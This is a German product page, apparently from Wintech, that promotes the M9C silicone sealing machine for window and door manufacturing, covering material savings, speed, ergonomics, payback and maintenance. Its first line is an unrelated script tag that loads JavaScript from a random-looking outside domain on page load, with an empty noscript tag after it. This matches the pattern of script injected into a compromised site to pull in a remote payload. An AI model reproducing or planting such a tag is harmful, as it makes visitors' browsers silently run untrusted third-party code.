<script type="text/javascript" src="http://www.alga9frog.com/js/162003.js" ></script> <noscript></noscript>

Die Vorteile der Maschine M9C

Materialgewinn

Die Versiegelungsmaschine M9C injiziert genau die richtige Menge an Silikon in der für diesen Zweck vorgesehene Fuge, dank einer Kombination von Versiegelungsgeschwindigkeit und Einspritzdruck.

Es gibt kein Silikon zu reinigen, keine Silikonspuren auf dem Glas, die nach einer Zeit eine für das Auge unangenehme und unschöne Folie generieren.

 

« Unsichtbares » Nageln der Glasleisten

Die Anwesenheit einer Fuge für das Silikon (Falz) in der Glasleiste erlaubt es, diese am Fugenboden zu nageln.

Die Spitzen werden dann durch das Silikon, das nach dem Nageln injiziert wird, maskiert. Man braucht die Nagelköpfe auf der Glasleiste nicht zu verstecken, was eine sehr deutliche Zeitersparnis bei der Fertigung darstellt.

 

Qualität une Gleichmäßigkeit des Versiegelns

Die Steuerung der injizierten Silikonmenge und das Glätten durch die Spritzdüse geben dem Versiegeln Qualität und eine ästhetische und unauffällige Dichtung, wodurch die Lichte Ihrer Fenster und Türen maximiert wird, während eine unübertroffene Dichtung gewährleistet wird.

 

Geschwindigkeit der Ausführung

Die Maschine M9C arbeitet schnell, weil sie die Injektion von Silikon auf beiden Seiten des Elementes gleichzeitig gewährleistet.
Ihre „Reisegeschwindigkeit “ ist etwa 2m pro Minute.

 

Ergonomie

Man braucht das Element nicht umzudrehen, um die Kontinuität der Dichtung zu gewährleisten.
Kein Kleben der Trockenfuge oder Gummidichtung; die Maschine M9C versiegelt von alleine beide Seiten.

Man muss nur die Ladestation mit Fenstern oder Türen versorgen dank einem Fördersystem oder einem Vakuumheber.

 

Platzgewinn in der Werkstatt

Die Maschine M9C arbeitet auf einer vertikalen Ebene. Ihre Standfläche ist also sehr begrenzt.
Die Maschine steht an einer Wand oder Trennwand und schafft die horizontalen Maschinentische ab.

Ein Förderband, das vor der Ladestation platziert wird, kann sogar als vertikaler Verglasungstisch dienen.

 

Arbeit in maskierter Zeit

Während die Maschine M9C arbeitet und ihre Fensterversorgung verwaltet, kann der Bediener an anderen Aufgaben arbeiten wie Verglasen, Anbringen der Glasleisten, Verlegung der Sprossen, Verpackung, ...

Als wesentlicher Faktor für die Produktivität am Ende der Fertigungslinie trägt die Wintech Versiegelungsmaschine oft zu einer Reorganisation des Arbeitsverlaufes und zur Erhöhung der produzierten Mengen bei.

 

Schnelle Rendite

Zwischen den Materialeinsparungen und der sehr deutlichen Einsparung an Arbeitskraft im Zusammenhang mit der Installation / Reinigung der Versiegelung, ist die Maschine M9C sehr schneller amortisiert, in der Regel etwa drei Jahre nach der Installation (je nach Anzahl der produzierten Fenster und Türen).

 

Geringe Wartung

Die Maschine M9C erfordert nur ein paar Auswechselungen von Einspritzdüsen wenn sie abgenützt sind und von dem Pumpenfilter alle 6 Monate. Das ist alles.
Man braucht weder die Silikonschläuche zu spülen noch zu reinigen, denn jeder ist einer Farbe gewidmet und kann mehrere Wochen „inaktiv“ bleiben, auch während der Sommerferien.

Wenn Sie den Schlauch wieder verwenden möchten, entfernen Sie einfach die Silikonkorken und reinigen den Injektionskanal der Düsen.